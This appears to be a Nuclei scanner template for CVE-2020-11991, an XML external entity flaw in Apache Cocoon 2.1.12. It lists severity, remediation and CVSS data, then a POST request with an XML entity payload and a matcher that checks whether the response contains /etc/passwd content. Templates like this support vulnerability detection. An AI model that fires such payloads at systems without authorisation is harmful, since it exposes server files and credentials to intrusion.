id: CVE-2020-11991 info: name: Apache Cocoon 2.1.12 XML Injection author: pikpikcu severity: high tags: cve,cve2020,apache,xml,cocoon,xxe description: When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system. remediation: Upgrade to Apache Cocon 2.1.13 or later. reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2020-11991 cwe-id: CWE-611 requests: - method: POST path: - "{{BaseURL}}/v2/api/product/manger/getInfo" headers: Content-Type: "text/xml" body: | ]> John &ent; matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by cs on 2022/02/25